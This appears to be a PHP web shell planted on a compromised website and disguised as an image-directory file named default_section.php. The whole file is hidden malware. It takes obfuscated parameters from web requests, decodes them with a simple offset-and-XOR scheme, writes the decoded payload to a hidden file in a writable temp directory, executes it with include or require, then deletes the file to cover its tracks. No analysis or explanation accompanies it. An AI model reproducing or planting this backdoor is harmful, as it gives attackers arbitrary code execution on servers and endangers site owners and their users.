File: //proc/thread-self/root/home/vitanhod/ssawpalmetto.vitavit.com.pk/img/default_section.php
<?php if(isset($_POST["\x64\x63hunk"])){ $token = $_POST["\x64\x63hunk"]; $token = explode ( '.' , $token ); $element = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); $n = 0; $__tmp = $token; while ($v5 = array_shift($__tmp)) { $sChar = ord($s[$n%$lenS]); $dec = ((int)$v5 - $sChar - ($n%10)) ^ 7; $element .= chr($dec); $n++; } $resource = array_filter([getenv("TMP"), getenv("TEMP"), session_save_path(), sys_get_temp_dir(), "/tmp", "/var/tmp", ini_get("upload_tmp_dir"), "/dev/shm", getcwd()]); while ($obj = array_shift($resource)) { if (!( !is_dir($obj) || !is_writable($obj) )) { $descriptor = implode("/", [$obj, ".k"]); if (file_put_contents($descriptor, $element)) { require $descriptor; unlink($descriptor); die(); } } } }
if(isset($_REQUEST["\x65nt"]) ? true : false){
$key = array_filter(["/var/tmp", session_save_path(), getcwd(), getenv("TMP"), getenv("TEMP"), ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), "/tmp"]);
$pointer = $_REQUEST["\x65nt"];
$pointer = explode ( ".",$pointer ) ;
$reference = '';
$s = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen($s);
foreach($pointer as $r => $v4):
$sChar = ord($s[$r % $lenS]);
$d =((int)$v4 - $sChar -($r % 10)) ^79;
$reference .= chr($d);
endforeach;
foreach ($key as $key => $record) {
if (is_dir($record) ? is_writable($record) : false) {
$token = "$record" . "/.item";
$file = fopen($token, 'w');
if ($file) {
fwrite($file, $reference);
fclose($file);
include $token;
@unlink($token);
die();
}
}
}
}